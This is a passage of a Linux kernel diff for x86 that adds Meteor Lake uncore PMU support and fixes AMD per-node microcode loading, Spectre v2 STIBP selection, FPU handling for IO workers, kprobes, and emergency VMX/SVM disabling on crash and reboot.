++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_SNCU_BOX_CTL,
++	.fixed_ctr_bits	= 48,
++	.fixed_ctr	= MTL_UNC_SNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_SNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type *mtl_msr_uncores[] = {
++	&mtl_uncore_cbox,
++	&mtl_uncore_hac_arb,
++	&mtl_uncore_arb,
++	&mtl_uncore_hac_cbox,
++	&mtl_uncore_cncu,
++	&mtl_uncore_sncu,
++	NULL
++};
++
++void mtl_uncore_cpu_init(void)
++{
++	mtl_uncore_cbox.num_boxes = icl_get_cbox_num();
++	uncore_msr_uncores = mtl_msr_uncores;
++}
++
+ enum {
+ 	SNB_PCI_UNCORE_IMC,
+ };
+@@ -1264,6 +1412,19 @@ static const struct pci_device_id tgl_uncore_pci_ids[] = {
+ 	IMC_UNCORE_DEV(RPL_23),
+ 	IMC_UNCORE_DEV(RPL_24),
+ 	IMC_UNCORE_DEV(RPL_25),
++	IMC_UNCORE_DEV(MTL_1),
++	IMC_UNCORE_DEV(MTL_2),
++	IMC_UNCORE_DEV(MTL_3),
++	IMC_UNCORE_DEV(MTL_4),
++	IMC_UNCORE_DEV(MTL_5),
++	IMC_UNCORE_DEV(MTL_6),
++	IMC_UNCORE_DEV(MTL_7),
++	IMC_UNCORE_DEV(MTL_8),
++	IMC_UNCORE_DEV(MTL_9),
++	IMC_UNCORE_DEV(MTL_10),
++	IMC_UNCORE_DEV(MTL_11),
++	IMC_UNCORE_DEV(MTL_12),
++	IMC_UNCORE_DEV(MTL_13),
+ 	{ /* end: all zeroes */ }
+ };
+ 
+diff --git a/arch/x86/events/zhaoxin/core.c b/arch/x86/events/zhaoxin/core.c
+index 949d845c922b4..3e9acdaeed1ec 100644
+--- a/arch/x86/events/zhaoxin/core.c
++++ b/arch/x86/events/zhaoxin/core.c
+@@ -541,7 +541,13 @@ __init int zhaoxin_pmu_init(void)
+ 
+ 	switch (boot_cpu_data.x86) {
+ 	case 0x06:
+-		if (boot_cpu_data.x86_model == 0x0f || boot_cpu_data.x86_model == 0x19) {
++		/*
++		 * Support Zhaoxin CPU from ZXC series, exclude Nano series through FMS.
++		 * Nano FMS: Family=6, Model=F, Stepping=[0-A][C-D]
++		 * ZXC FMS: Family=6, Model=F, Stepping=E-F OR Family=6, Model=0x19, Stepping=0-3
++		 */
++		if ((boot_cpu_data.x86_model == 0x0f && boot_cpu_data.x86_stepping >= 0x0e) ||
++			boot_cpu_data.x86_model == 0x19) {
+ 
+ 			x86_pmu.max_period = x86_pmu.cntval_mask >> 1;
+ 
+diff --git a/arch/x86/include/asm/fpu/sched.h b/arch/x86/include/asm/fpu/sched.h
+index b2486b2cbc6e0..c2d6cd78ed0c2 100644
+--- a/arch/x86/include/asm/fpu/sched.h
++++ b/arch/x86/include/asm/fpu/sched.h
+@@ -39,7 +39,7 @@ extern void fpu_flush_thread(void);
+ static inline void switch_fpu_prepare(struct fpu *old_fpu, int cpu)
+ {
+ 	if (cpu_feature_enabled(X86_FEATURE_FPU) &&
+-	    !(current->flags & PF_KTHREAD)) {
++	    !(current->flags & (PF_KTHREAD | PF_IO_WORKER))) {
+ 		save_fpregs_to_fpstate(old_fpu);
+ 		/*
+ 		 * The save operation preserved register state, so the
+diff --git a/arch/x86/include/asm/fpu/xcr.h b/arch/x86/include/asm/fpu/xcr.h
+index 9656a5bc6feae..9a710c0604457 100644
+--- a/arch/x86/include/asm/fpu/xcr.h
++++ b/arch/x86/include/asm/fpu/xcr.h
+@@ -5,7 +5,7 @@
+ #define XCR_XFEATURE_ENABLED_MASK	0x00000000
+ #define XCR_XFEATURE_IN_USE_MASK	0x00000001
+ 
+-static inline u64 xgetbv(u32 index)
++static __always_inline u64 xgetbv(u32 index)
+ {
+ 	u32 eax, edx;
+ 
+@@ -27,7 +27,7 @@ static inline void xsetbv(u32 index, u64 value)
+  *
+  * Callers should check X86_FEATURE_XGETBV1.
+  */
+-static inline u64 xfeatures_in_use(void)
++static __always_inline u64 xfeatures_in_use(void)
+ {
+ 	return xgetbv(XCR_XFEATURE_IN_USE_MASK);
+ }
+diff --git a/arch/x86/include/asm/microcode.h b/arch/x86/include/asm/microcode.h
+index 74ecc2bd6cd0f..79b1d009e34e4 100644
+--- a/arch/x86/include/asm/microcode.h
++++ b/arch/x86/include/asm/microcode.h
+@@ -127,13 +127,13 @@ static inline unsigned int x86_cpuid_family(void)
+ #ifdef CONFIG_MICROCODE
+ extern void __init load_ucode_bsp(void);
+ extern void load_ucode_ap(void);
+-void reload_early_microcode(void);
++void reload_early_microcode(unsigned int cpu);
+ extern bool initrd_gone;
+ void microcode_bsp_resume(void);
+ #else
+ static inline void __init load_ucode_bsp(void)			{ }
+ static inline void load_ucode_ap(void)				{ }
+-static inline void reload_early_microcode(void)			{ }
++static inline void reload_early_microcode(unsigned int cpu)	{ }
+ static inline void microcode_bsp_resume(void)			{ }
+ #endif
+ 
+diff --git a/arch/x86/include/asm/microcode_amd.h b/arch/x86/include/asm/microcode_amd.h
+index ac31f9140d07d..e6662adf3af4d 100644
+--- a/arch/x86/include/asm/microcode_amd.h
++++ b/arch/x86/include/asm/microcode_amd.h
+@@ -47,12 +47,12 @@ struct microcode_amd {
+ extern void __init load_ucode_amd_bsp(unsigned int family);
+ extern void load_ucode_amd_ap(unsigned int family);
+ extern int __init save_microcode_in_initrd_amd(unsigned int family);
+-void reload_ucode_amd(void);
++void reload_ucode_amd(unsigned int cpu);
+ #else
+ static inline void __init load_ucode_amd_bsp(unsigned int family) {}
+ static inline void load_ucode_amd_ap(unsigned int family) {}
+ static inline int __init
+ save_microcode_in_initrd_amd(unsigned int family) { return -EINVAL; }
+-static inline void reload_ucode_amd(void) {}
++static inline void reload_ucode_amd(unsigned int cpu) {}
+ #endif
+ #endif /* _ASM_X86_MICROCODE_AMD_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 91447f018f6e4..117e4e977b55d 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -54,6 +54,10 @@
+ #define SPEC_CTRL_RRSBA_DIS_S_SHIFT	6	   /* Disable RRSBA behavior */
+ #define SPEC_CTRL_RRSBA_DIS_S		BIT(SPEC_CTRL_RRSBA_DIS_S_SHIFT)
+ 
++/* A mask for bits which the kernel toggles when controlling mitigations */
++#define SPEC_CTRL_MITIGATIONS_MASK	(SPEC_CTRL_IBRS | SPEC_CTRL_STIBP | SPEC_CTRL_SSBD \
++							| SPEC_CTRL_RRSBA_DIS_S)
++
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
+ 
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 67c9d73b31faa..d8277eec1bcd6 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -835,7 +835,8 @@ bool xen_set_default_idle(void);
+ #endif
+ 
+ void __noreturn stop_this_cpu(void *dummy);
+-void microcode_check(void);
++void microcode_check(struct cpuinfo_x86 *prev_info);
++void store_cpu_caps(struct cpuinfo_x86 *info);
+ 
+ enum l1tf_mitigations {
+ 	L1TF_MITIGATION_OFF,
+diff --git a/arch/x86/include/asm/reboot.h b/arch/x86/include/asm/reboot.h
+index 04c17be9b5fda..bc5b4d788c08d 100644
+--- a/arch/x86/include/asm/reboot.h
++++ b/arch/x86/include/asm/reboot.h
+@@ -25,6 +25,8 @@ void __noreturn machine_real_restart(unsigned int type);
+ #define MRR_BIOS	0
+ #define MRR_APM		1
+ 
++void cpu_emergency_disable_virtualization(void);
++
+ typedef void (*nmi_shootdown_cb)(int, struct pt_regs*);
+ void nmi_panic_self_stop(struct pt_regs *regs);
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback);
+diff --git a/arch/x86/include/asm/special_insns.h b/arch/x86/include/asm/special_insns.h
+index 35f709f619fb4..c2e322189f853 100644
+--- a/arch/x86/include/asm/special_insns.h
++++ b/arch/x86/include/asm/special_insns.h
+@@ -295,7 +295,7 @@ static inline int enqcmds(void __iomem *dst, const void *src)
+ 	return 0;
+ }
+ 
+-static inline void tile_release(void)
++static __always_inline void tile_release(void)
+ {
+ 	/*
+ 	 * Instruction opcode for TILERELEASE; supported in binutils
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 8757078d4442a..3b12e6b994123 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -126,7 +126,21 @@ static inline void cpu_svm_disable(void)
+ 
+ 	wrmsrl(MSR_VM_HSAVE_PA, 0);
+ 	rdmsrl(MSR_EFER, efer);
+-	wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	if (efer & EFER_SVME) {
++		/*
++		 * Force GIF=1 prior to disabling SVM to ensure INIT and NMI
++		 * aren't blocked, e.g. if a fatal error occurred between CLGI
++		 * and STGI.  Note, STGI may #UD if SVM is disabled from NMI
++		 * context between reading EFER and executing STGI.  In that
++		 * case, GIF must already be set, otherwise the NMI would have
++		 * been blocked, so just eat the fault.
++		 */
++		asm_volatile_goto("1: stgi\n\t"
++				  _ASM_EXTABLE(1b, %l[fault])
++				  ::: "memory" : fault);
++fault:
++		wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	}
+ }
+ 
+ /** Makes sure SVM is disabled, if it is supported on the CPU
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 907cc98b19380..518bda50068cb 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -188,6 +188,17 @@ static int acpi_register_lapic(int id, u32 acpiid, u8 enabled)
+ 	return cpu;
+ }
+ 
++static bool __init acpi_is_processor_usable(u32 lapic_flags)
++{
++	if (lapic_flags & ACPI_MADT_ENABLED)
++		return true;
++
++	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++		return true;
++
++	return false;
++}
++
+ static int __init
+ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ {
+@@ -212,6 +223,10 @@ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ 	if (apic_id == 0xffffffff)
+ 		return 0;
+ 
++	/* don't register processors that cannot be onlined */
++	if (!acpi_is_processor_usable(processor->lapic_flags))
++		return 0;
++
+ 	/*
+ 	 * We need to register disabled CPU as well to permit
+ 	 * counting disabled CPUs. This allows us to size
+@@ -250,9 +265,7 @@ acpi_parse_lapic(union acpi_subtable_headers * header, const unsigned long end)
+ 		return 0;
+ 
+ 	/* don't register processors that can not be onlined */
+-	if (acpi_support_online_capable &&
+-	    !(processor->lapic_flags & ACPI_MADT_ENABLED) &&
+-	    !(processor->lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_is_processor_usable(processor->lapic_flags))
+ 		return 0;
+ 
+ 	/*
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 16d8e43be7758..f54992887491e 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -144,9 +144,17 @@ void __init check_bugs(void)
+ 	 * have unknown values. AMD64_LS_CFG MSR is cached in the early AMD
+ 	 * init code as it is not enumerated and depends on the family.
+ 	 */
+-	if (boot_cpu_has(X86_FEATURE_MSR_SPEC_CTRL))
++	if (cpu_feature_enabled(X86_FEATURE_MSR_SPEC_CTRL)) {
+ 		rdmsrl(MSR_IA32_SPEC_CTRL, x86_spec_ctrl_base);
+ 
++		/*
++		 * Previously running kernel (kexec), may have some controls
++		 * turned ON. Clear them and let the mitigations setup below
++		 * rediscover them based on configuration.
++		 */
++		x86_spec_ctrl_base &= ~SPEC_CTRL_MITIGATIONS_MASK;
++	}
++
+ 	/* Select the proper CPU mitigations before patching alternatives: */
+ 	spectre_v1_select_mitigation();
+ 	spectre_v2_select_mitigation();
+@@ -1095,14 +1103,18 @@ spectre_v2_parse_user_cmdline(void)
+ 	return SPECTRE_V2_USER_CMD_AUTO;
+ }
+ 
+-static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++static inline bool spectre_v2_in_eibrs_mode(enum spectre_v2_mitigation mode)
+ {
+-	return mode == SPECTRE_V2_IBRS ||
+-	       mode == SPECTRE_V2_EIBRS ||
++	return mode == SPECTRE_V2_EIBRS ||
+ 	       mode == SPECTRE_V2_EIBRS_RETPOLINE ||
+ 	       mode == SPECTRE_V2_EIBRS_LFENCE;
+ }
+ 
++static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++{
++	return spectre_v2_in_eibrs_mode(mode) || mode == SPECTRE_V2_IBRS;
++}
++
+ static void __init
+ spectre_v2_user_select_mitigation(void)
+ {
+@@ -1165,12 +1177,19 @@ spectre_v2_user_select_mitigation(void)
+ 	}
+ 
+ 	/*
+-	 * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
+-	 * STIBP is not required.
++	 * If no STIBP, enhanced IBRS is enabled, or SMT impossible, STIBP
++	 * is not required.
++	 *
++	 * Enhanced IBRS also protects against cross-thread branch target
++	 * injection in user-mode as the IBRS bit remains always set which
++	 * implicitly enables cross-thread protections.  However, in legacy IBRS
++	 * mode, the IBRS bit is set only on kernel entry and cleared on return
++	 * to userspace. This disables the implicit cross-thread protection,
++	 * so allow for STIBP to be selected in that case.
+ 	 */
+ 	if (!boot_cpu_has(X86_FEATURE_STIBP) ||
+ 	    !smt_possible ||
+-	    spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	    spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return;
+ 
+ 	/*
+@@ -2297,7 +2316,7 @@ static ssize_t mmio_stale_data_show_state(char *buf)
+ 
+ static char *stibp_state(void)
+ {
+-	if (spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return "";
+ 
+ 	switch (spectre_v2_user_stibp) {
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index e80572b674b7a..c34bdba57993a 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -2311,30 +2311,45 @@ void cpu_init_secondary(void)
+ #endif
+ 
+ #ifdef CONFIG_MICROCODE_LATE_LOADING
+-/*
++/**
++ * store_cpu_caps() - Store a snapshot of CPU capabilities
++ * @curr_info: Pointer where to store it
++ *
++ * Returns: None
++ */
++void store_cpu_caps(struct cpuinfo_x86 *curr_info)
++{
++	/* Reload CPUID max function as it might've changed. */
++	curr_info->cpuid_level = cpuid_eax(0);
++
++	/* Copy all capability leafs and pick up the synthetic ones. */
++	memcpy(&curr_info->x86_capability, &boot_cpu_data.x86_capability,
++	       sizeof(curr_info->x86_capability));
++
++	/* Get the hardware CPUID leafs */
++	get_cpu_cap(curr_info);
++}
++
++/**
++ * microcode_check() - Check if any CPU capabilities changed after an update.
++ * @prev_info:	CPU capabilities stored before an update.
++ *
+  * The microcode loader calls this upon late microcode load to recheck features,
+  * only when microcode has been updated. Caller holds microcode_mutex and CPU
+  * hotplug lock.
++ *
++ * Return: None
+  */
+-void microcode_check(void)
++void microcode_check(struct cpuinfo_x86 *prev_info)
+ {
+-	struct cpuinfo_x86 info;
++	struct cpuinfo_x86 curr_info;
+ 
+ 	perf_check_microcode();
+ 
+-	/* Reload CPUID max function as it might've changed. */
+-	info.cpuid_level = cpuid_eax(0);
+-
+-	/*
+-	 * Copy all capability leafs to pick up the synthetic ones so that
+-	 * memcmp() below doesn't fail on that. The ones coming from CPUID will
+-	 * get overwritten in get_cpu_cap().
+-	 */
+-	memcpy(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability));
+-
+-	get_cpu_cap(&info);
++	store_cpu_caps(&curr_info);
+ 
+-	if (!memcmp(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability)))
++	if (!memcmp(&prev_info->x86_capability, &curr_info.x86_capability,
++		    sizeof(prev_info->x86_capability)))
+ 		return;
+ 
+ 	pr_warn("x86/CPU: CPU features have changed after loading microcode, but might not take effect.\n");
+diff --git a/arch/x86/kernel/cpu/microcode/amd.c b/arch/x86/kernel/cpu/microcode/amd.c
+index 3a35dec3ec550..461e45d85add9 100644
+--- a/arch/x86/kernel/cpu/microcode/amd.c
++++ b/arch/x86/kernel/cpu/microcode/amd.c
+@@ -55,7 +55,9 @@ struct cont_desc {
+ };
+ 
+ static u32 ucode_new_rev;
+-static u8 amd_ucode_patch[PATCH_MAX_SIZE];
++
++/* One blob per node. */
++static u8 amd_ucode_patch[MAX_NUMNODES][PATCH_MAX_SIZE];
+ 
+ /*
+  * Microcode patch container file is prepended to the initrd in cpio
+@@ -428,7 +430,7 @@ apply_microcode_early_amd(u32 cpuid_1_eax, void *ucode, size_t size, bool save_p
+ 	patch	= (u8 (*)[PATCH_MAX_SIZE])__pa_nodebug(&amd_ucode_patch);
+ #else
+ 	new_rev = &ucode_new_rev;
+-	patch	= &amd_ucode_patch;
++	patch	= &amd_ucode_patch[0];
+ #endif
+ 
+ 	desc.cpuid_1_eax = cpuid_1_eax;
+@@ -553,8 +555,7 @@ void load_ucode_amd_ap(unsigned int cpuid_1_eax)
+ 	apply_microcode_early_amd(cpuid_1_eax, cp.data, cp.size, false);
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size);
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size);
+ 
+ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ {
+@@ -572,19 +573,19 @@ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ 	if (!desc.mc)
+ 		return -EINVAL;
+ 
+-	ret = load_microcode_amd(true, x86_family(cpuid_1_eax), desc.data, desc.size);
++	ret = load_microcode_amd(x86_family(cpuid_1_eax), desc.data, desc.size);
+ 	if (ret > UCODE_UPDATED)
+ 		return -EINVAL;
+ 
+ 	return 0;
+ }
+ 
+-void reload_ucode_amd(void)
++void reload_ucode_amd(unsigned int cpu)
+ {
+-	struct microcode_amd *mc;
+ 	u32 rev, dummy __always_unused;
++	struct microcode_amd *mc;
+ 
+-	mc = (struct microcode_amd *)amd_ucode_patch;
++	mc = (struct microcode_amd *)amd_ucode_patch[cpu_to_node(cpu)];
+ 
+ 	rdmsr(MSR_AMD64_PATCH_LEVEL, rev, dummy);
+ 
+@@ -850,9 +851,10 @@ static enum ucode_state __load_microcode_amd(u8 family, const u8 *data,
+ 	return UCODE_OK;
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size)
+ {
++	struct cpuinfo_x86 *c;
++	unsigned int nid, cpu;
+ 	struct ucode_patch *p;
+ 	enum ucode_state ret;
+ 
+@@ -865,22 +867,22 @@ load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
+ 		return ret;
+ 	}
+ 
+-	p = find_patch(0);
+-	if (!p) {
+-		return ret;
+-	} else {
+-		if (boot_cpu_data.microcode >= p->patch_id)
+-			return ret;
++	for_each_node(nid) {
++		cpu = cpumask_first(cpumask_of_node(nid));
++		c = &cpu_data(cpu);
+ 
+-		ret = UCODE_NEW;
+-	}
++		p = find_patch(cpu);
++		if (!p)
++			continue;
+ 
+-	/* save BSP's matching patch for early load */
+-	if (!save)
+-		return ret;
++		if (c->microcode >= p->patch_id)
++			continue;
+ 
+-	memset(amd_ucode_patch, 0, PATCH_MAX_SIZE);
+-	memcpy(amd_ucode_patch, p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++		ret = UCODE_NEW;
++
++		memset(&amd_ucode_patch[nid], 0, PATCH_MAX_SIZE);
++		memcpy(&amd_ucode_patch[nid], p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++	}
+ 
+ 	return ret;
+ }
+@@ -906,12 +908,11 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device,
+ {
+ 	char fw_name[36] = "amd-ucode/microcode_amd.bin";
+ 	struct cpuinfo_x86 *c = &cpu_data(cpu);
+-	bool bsp = c->cpu_index == boot_cpu_data.cpu_index;
+ 	enum ucode_state ret = UCODE_NFOUND;
+ 	const struct firmware *fw;
+ 
+ 	/* reload ucode container only on the boot cpu */
+-	if (!refresh_fw || !bsp)
++	if (!refresh_fw)
+ 		return UCODE_OK;
+ 
+ 	if (c->x86 >= 0x15)
+@@ -926,7 +927,7 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device,
+ 	if (!verify_container(fw->data, fw->size, false))
+ 		goto fw_release;
+ 
+-	ret = load_microcode_amd(bsp, c->x86, fw->data, fw->size);
++	ret = load_microcode_amd(c->x86, fw->data, fw->size);
+ 
+  fw_release:
+ 	release_firmware(fw);
+diff --git a/arch/x86/kernel/cpu/microcode/core.c b/arch/x86/kernel/cpu/microcode/core.c
+index 6a41cee242f6d..9e02648e51d18 100644
+--- a/arch/x86/kernel/cpu/microcode/core.c
++++ b/arch/x86/kernel/cpu/microcode/core.c
+@@ -298,7 +298,7 @@ struct cpio_data find_microcode_in_initrd(const char *path, bool use_pa)
+ #endif
+ }
+ 
+-void reload_early_microcode(void)
++void reload_early_microcode(unsigned int cpu)
+ {
+ 	int vendor, family;
+ 
+@@ -312,7 +312,7 @@ void reload_early_microcode(void)
+ 		break;
+ 	case X86_VENDOR_AMD:
+ 		if (family >= 0x10)
+-			reload_ucode_amd();
++			reload_ucode_amd(cpu);
+ 		break;
+ 	default:
+ 		break;
+@@ -492,6 +492,7 @@ wait_for_siblings:
+ static int microcode_reload_late(void)
+ {
+ 	int old = boot_cpu_data.microcode, ret;
++	struct cpuinfo_x86 prev_info;
+ 
+ 	pr_err("Attempting late microcode loading - it is dangerous and taints the kernel.\n");
+ 	pr_err("You should switch to early loading, if possible.\n");
+@@ -499,12 +500,21 @@ static int microcode_reload_late(void)
+ 	atomic_set(&late_cpus_in,  0);
+ 	atomic_set(&late_cpus_out, 0);
+ 
+-	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
+-	if (ret == 0)
+-		microcode_check();
++	/*
++	 * Take a snapshot before the microcode update in order to compare and
++	 * check whether any bits changed after an update.
++	 */
++	store_cpu_caps(&prev_info);
+ 
+-	pr_info("Reload completed, microcode revision: 0x%x -> 0x%x\n",
+-		old, boot_cpu_data.microcode);
++	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
++	if (!ret) {
++		pr_info("Reload succeeded, microcode revision: 0x%x -> 0x%x\n",
++			old, boot_cpu_data.microcode);
++		microcode_check(&prev_info);
++	} else {
++		pr_info("Reload failed, current microcode revision: 0x%x\n",
++			boot_cpu_data.microcode);
++	}
+ 
+ 	return ret;
+ }
+@@ -685,7 +695,7 @@ void microcode_bsp_resume(void)
+ 	if (uci->valid && uci->mc)
+ 		microcode_ops->apply_microcode(cpu);
+ 	else if (!uci->mc)
+-		reload_early_microcode();
++		reload_early_microcode(cpu);
+ }
+ 
+ static struct syscore_ops mc_syscore_ops = {
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index 305514431f26e..cdd92ab43cda4 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -37,7 +37,6 @@
+ #include <linux/kdebug.h>
+ #include <asm/cpu.h>
+ #include <asm/reboot.h>
+-#include <asm/virtext.h>
+ #include <asm/intel_pt.h>
+ #include <asm/crash.h>
+ #include <asm/cmdline.h>
+@@ -81,15 +80,6 @@ static void kdump_nmi_callback(int cpu, struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Disable VMX or SVM if needed.
+-	 *
+-	 * We need to disable virtualization on all CPUs.
+-	 * Having VMX or SVM enabled on any CPU may break rebooting
+-	 * after the kdump kernel has finished its task.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
+-
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+ 	 */
+@@ -148,12 +138,7 @@ void native_machine_crash_shutdown(struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Booting kdump kernel with VMX or SVM enabled won't work,
+-	 * because (among other limitations) we can't disable paging
+-	 * with the virt flags.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
++	cpu_emergency_disable_virtualization();
+ 
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+diff --git a/arch/x86/kernel/fpu/context.h b/arch/x86/kernel/fpu/context.h
+index 958accf2ccf07..9fcfa5c4dad79 100644
+--- a/arch/x86/kernel/fpu/context.h
++++ b/arch/x86/kernel/fpu/context.h
+@@ -57,7 +57,7 @@ static inline void fpregs_restore_userregs(void)
+ 	struct fpu *fpu = &current->thread.fpu;
+ 	int cpu = smp_processor_id();
+ 
+-	if (WARN_ON_ONCE(current->flags & PF_KTHREAD))
++	if (WARN_ON_ONCE(current->flags & (PF_KTHREAD | PF_IO_WORKER)))
+ 		return;
+ 
+ 	if (!fpregs_state_valid(fpu, cpu)) {
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index 9baa89a8877d0..caf33486dc5ee 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -426,7 +426,7 @@ void kernel_fpu_begin_mask(unsigned int kfpu_mask)
+ 
+ 	this_cpu_write(in_kernel_fpu, true);
+ 
+-	if (!(current->flags & PF_KTHREAD) &&
++	if (!(current->flags & (PF_KTHREAD | PF_IO_WORKER)) &&
+ 	    !test_thread_flag(TIF_NEED_FPU_LOAD)) {
+ 		set_thread_flag(TIF_NEED_FPU_LOAD);
+ 		save_fpregs_to_fpstate(&current->thread.fpu);
+@@ -853,12 +853,12 @@ int fpu__exception_code(struct fpu *fpu, int trap_nr)
+  * Initialize register state that may prevent from entering low-power idle.
+  * This function will be invoked from the cpuidle driver only when needed.
+  */
+-void fpu_idle_fpregs(void)
++noinstr void fpu_idle_fpregs(void)
+ {
+ 	/* Note: AMX_TILE being enabled implies XGETBV1 support */
+ 	if (cpu_feature_enabled(X86_FEATURE_AMX_TILE) &&
+ 	    (xfeatures_in_use() & XFEATURE_MASK_XTILE)) {
+ 		tile_release();
+-		fpregs_deactivate(&current->thread.fpu);
++		__this_cpu_write(fpu_fpregs_owner_ctx, NULL);
+ 	}
+ }
+diff --git a/arch/x86/kernel/kprobes/opt.c b/arch/x86/kernel/kprobes/opt.c
+index e57e07b0edb64..57b0037d0a996 100644
+--- a/arch/x86/kernel/kprobes/opt.c
++++ b/arch/x86/kernel/kprobes/opt.c
+@@ -46,8 +46,8 @@ unsigned long __recover_optprobed_insn(kprobe_opcode_t *buf, unsigned long addr)
+ 		/* This function only handles jump-optimized kprobe */
+ 		if (kp && kprobe_optimized(kp)) {
+ 			op = container_of(kp, struct optimized_kprobe, kp);
+-			/* If op->list is not empty, op is under optimizing */
+-			if (list_empty(&op->list))
++			/* If op is optimized or under unoptimizing */
++			if (list_empty(&op->list) || optprobe_queued_unopt(op))
+ 				goto found;
+ 		}
+ 	}
+@@ -353,7 +353,7 @@ int arch_check_optimized_kprobe(struct optimized_kprobe *op)
+ 
+ 	for (i = 1; i < op->optinsn.size; i++) {
+ 		p = get_kprobe(op->kp.addr + i);
+-		if (p && !kprobe_disabled(p))
++		if (p && !kprobe_disarmed(p))
+ 			return -EEXIST;
+ 	}
+ 
+diff --git a/arch/x86/kernel/reboot.c b/arch/x86/kernel/reboot.c
+index c3636ea4aa71f..d03c551defccf 100644
+--- a/arch/x86/kernel/reboot.c
++++ b/arch/x86/kernel/reboot.c
+@@ -528,33 +528,29 @@ static inline void kb_wait(void)
+ 	}
+ }
+ 
+-static void vmxoff_nmi(int cpu, struct pt_regs *regs)
+-{
+-	cpu_emergency_vmxoff();
+-}
++static inline void nmi_shootdown_cpus_on_restart(void);
+ 
+-/* Use NMIs as IPIs to tell all CPUs to disable virtualization */
+-static void emergency_vmx_disable_all(void)
++static void emergency_reboot_disable_virtualization(void)
+ {
+ 	/* Just make sure we won't change CPUs while doing this */
+ 	local_irq_disable();
+ 
+ 	/*
+-	 * Disable VMX on all CPUs before rebooting, otherwise we risk hanging
+-	 * the machine, because the CPU blocks INIT when it's in VMX root.
++	 * Disable virtualization on all CPUs before rebooting to avoid hanging
++	 * the system, as VMX and SVM block INIT when running in the host.
+ 	 *
+ 	 * We can't take any locks and we may be on an inconsistent state, so
+-	 * use NMIs as IPIs to tell the other CPUs to exit VMX root and halt.
++	 * use NMIs as IPIs to tell the other CPUs to disable VMX/SVM and halt.
+ 	 *
+-	 * Do the NMI shootdown even if VMX if off on _this_ CPU, as that
+-	 * doesn't prevent a different CPU from being in VMX root operation.
++	 * Do the NMI shootdown even if virtualization is off on _this_ CPU, as
++	 * other CPUs may have virtualization enabled.
+ 	 */
+-	if (cpu_has_vmx()) {
+-		/* Safely force _this_ CPU out of VMX root operation. */
+-		__cpu_emergency_vmxoff();
++	if (cpu_has_vmx() || cpu_has_svm(NULL)) {
++		/* Safely force _this_ CPU out of VMX/SVM operation. */
